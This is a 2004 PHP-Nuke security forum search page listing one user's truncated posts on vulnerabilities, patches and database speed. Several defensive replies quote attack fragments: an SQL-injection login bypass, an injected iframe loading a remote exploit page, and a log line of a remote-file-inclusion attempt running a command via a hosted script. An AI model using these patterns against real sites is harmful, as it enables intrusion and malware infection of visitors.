You are missing our premiere tool bar navigation system! Register and use it for FREE!

NukeCops  
•  Home •  Downloads •  Gallery •  Your Account •  Forums • 
Readme First
- Readme First! -

Read and follow the rules, otherwise your posts will be closed
Modules
· Home
· FAQ
· Buy a Theme
· Advertising
· AvantGo
· Bookmarks
· Columbia
· Community
· Donations
· Downloads
· Feedback
· Forums
· PHP-Nuke HOWTO
· Private Messages
· Search
· Statistics
· Stories Archive
· Submit News
· Surveys
· Theme Gallery
· Top
· Topics
· Your Account
Who's Online
There are currently, 209 guest(s) and 0 member(s) that are online.

You are Anonymous user. You can register for free by clicking here
Nuke Cops :: Search [ ]
 Forum FAQ  •  Search  •   •  Memberlist  •  Usergroups   •  Register  •  Profile •    •  Log in to check your private messages  •  Log in

Search found 19 matches
Author Message
Topic: This new security hole...
alexm

Replies: 50
Views: 39066

PostForum: Nuke Security   Posted: Mon Jun 07, 2004 4:57 am   Subject: This new security hole...
I've seen something similar inside CPG-Nuke about 5 weeks ago.
if (!defined('CPG_NUKE')) {
die ("You can't access this file directly...");
}

Insid ...
Topic: This new security hole...
alexm

Replies: 50
Views: 39066

PostForum: Nuke Security   Posted: Fri Jun 04, 2004 3:45 pm   Subject: Re: This new security hole...

Is the fix listed the best one to use?

I'm not an expert on this subject, but the best fix is to make sure that safe_mode is "On" in your PHP. This will disable other users' ability to include() ...
Topic: Is this a Major Hole?
alexm

Replies: 1
Views: 1985

PostForum: Nuke Security   Posted: Sun May 02, 2004 5:16 pm   Subject: Re: Is this a Major Hole?
The sql statement would look like this:
SELECT userdetails FROM userlist WHERE uid='booboo'; -- AND pwd='';
Actually, it would probably look a bit more like:
SELECT userdetails FROM userlist WHERE ...
Topic: Base64 File Level Patch by Chatserv
alexm

Replies: 2
Views: 2712

PostForum: Nuke Security   Posted: Sat May 01, 2004 5:22 am   Subject: Re: Base64 File Level Patch by Chatserv

$admin = addslashes($admin);
$admin = base64_decode($admin);


Would someone mind telling me why slashing a base64 encoded string is useful? Is there a bug in the PHP base64 decoding bein ...
Topic: GET RID OF UNION HACKS 100%
alexm

Replies: 21
Views: 17047

PostForum: Nuke Security   Posted: Fri Apr 23, 2004 10:35 am   Subject: GET RID OF UNION HACKS 100%
Since this UNION is passed in base64 encoding, how is a simple expression evaluation going to matter here?

Because he's catching the "union" as it's passed to the underlying database layer. It's a ...
Topic: Website Infected by Virus - Hacked ?
alexm

Replies: 3
Views: 3750

PostForum: Nuke Security   Posted: Wed Apr 21, 2004 10:23 am   Subject: Re: Website Infected by Virus - Hacked ?
For starters, remove this code from your footers. (check footer.php and footer lines in the Preferences admin panel).<iframe src="http://www.turkcode.com/exploit.htm" width="-1& ...
Topic: Web Links: security fix
alexm

Replies: 18
Views: 10149

PostForum: Nuke Security   Posted: Fri Apr 02, 2004 1:23 pm   Subject: Re: Web Links: security fix
Why not just put it before the switch($l_op) { and be done with it?

It looks like it's just checking to make sure there are no fancy html entities or the word "union" in the $orderby. Did I miss s ...
Topic: New critical admin vulnerability in all Nukes
alexm

Replies: 7
Views: 7036

PostForum: Nuke Security   Posted: Mon Mar 29, 2004 12:14 pm   Subject: Re: New critical admin vulnerability in all Nukes

function deleteNotice($id, $table, $op_back) {
global $db;
$id = intval($id);
$db->sql_query("DELETE FROM ".$prefix."_reviews_add WHERE id = ...
Topic: Forums are getting slower and slower everyday.
alexm

Replies: 16
Views: 23433

PostForum: Speed Freaks   Posted: Fri Mar 12, 2004 6:33 am   Subject: Re: Forums are getting slower and slower everyday.
People are getting very pissed off, I remember reading few posts by Pual (ZX) about speeding up forum's speed, but can't seem to find them.
Any idea guys?


I think [url=http://www.nukecops.com/ar ...
Topic: phpnuke != secure
alexm

Replies: 9
Views: 5797

PostForum: Nuke Security   Posted: Thu Feb 26, 2004 9:20 am   Subject: Re: phpnuke != secure

200.161.186.169 - - [25/Feb/2004:20:17:53 -0500] "GET /index.php?link=http://www.simol.com.br/cmd.txt?&cmd=id HTTP/1.1" 200 44425 "http://www.xeronet.org/i ...
Topic: Minor (major?) speed tweaking with table indexes...
alexm

Replies: 2
Views: 4351

PostForum: Speed Freaks   Posted: Wed Feb 25, 2004 3:44 pm   Subject: Re: Minor (major?) speed tweaking with table indexes...
Actualy there are loads more and i'm editing the "News" module at the moment.

Just breezing through the mainfile.php and doing a quick spot-check, there's plenty of room for improvement in this are ...
Topic: Minor (major?) speed tweaking with table indexes...
alexm

Replies: 2
Views: 4351

PostForum: Speed Freaks   Posted: Wed Feb 25, 2004 8:34 am   Subject: Minor (major?) speed tweaking with table indexes...
I think there's room for some more minor (maybe major?) speed increases in the database table setups. For example:

block-Forums.php from cpgnuke distro:

SELECT t.forum_id, topic_id, topic_title ...
Topic: Heads up!! -Nuke Scripting and SQL Injection issue - 2/10/04
alexm

Replies: 14
Views: 9225

PostForum: Nuke Security   Posted: Tue Feb 10, 2004 6:05 pm   Subject: Re: Heads up!! -Nuke Scripting and SQL Injection issue - 2/1

1) Which file do I add the code change to


As was already mentioned, this is mainfile.php.


2) Is this an issue for Nuke 6.7? running with mySql 3.23.56


I'd imagine the exploit is the ...
Topic: Heads up!! -Nuke Scripting and SQL Injection issue - 2/10/04
alexm

Replies: 14
Views: 9225

PostForum: Nuke Security   Posted: Tue Feb 10, 2004 3:22 pm   Subject: Re: Heads up!! -Nuke Scripting and SQL Injection issue - 2/1

Any idea if a fix is coming soon? Or does anyone know the fix and can paste the code here?


These will stop the sql injection...

Quick Fix #1: Disable broadcast messages on Admin Panel -> P ...
Topic: Hacked and have the SQL insertion available
alexm

Replies: 26
Views: 23681

PostForum: Nuke Security   Posted: Wed Feb 04, 2004 6:23 am   Subject: Re: Hacked and have the SQL insertion available
Thank you djmaze,
Funny thing is I'd only just changed my password the previous day and the code works on a different (later) version of PHPNuke where my username and password are completely differen ...
 

 Jump to:   


Powered by phpBB © 2001, 2005 phpBB Group

Ported by Nuke Cops © 2003 www.nukecops.com
:: FI Theme :: PHP-Nuke theme by coldblooded (www.nukemods.com) ::
Powered by TOGETHER TEAM srl ITALY http://www.togetherteam.it - DONDELEO E-COMMERCE http://www.DonDeLeo.com - TUTTISU E-COMMERCE http://www.tuttisu.it
Web site engine's code is Copyright © 2002 by PHP-Nuke. All Rights Reserved. PHP-Nuke is Free Software released under the GNU/GPL license.
Page Generation: 0.090 Seconds - 318 pages served in past 5 minutes. Nuke Cops Founded by Paul Laudanski (Zhen-Xjell)
:: FI Theme :: PHP-Nuke theme by coldblooded (www.nukemods.com) ::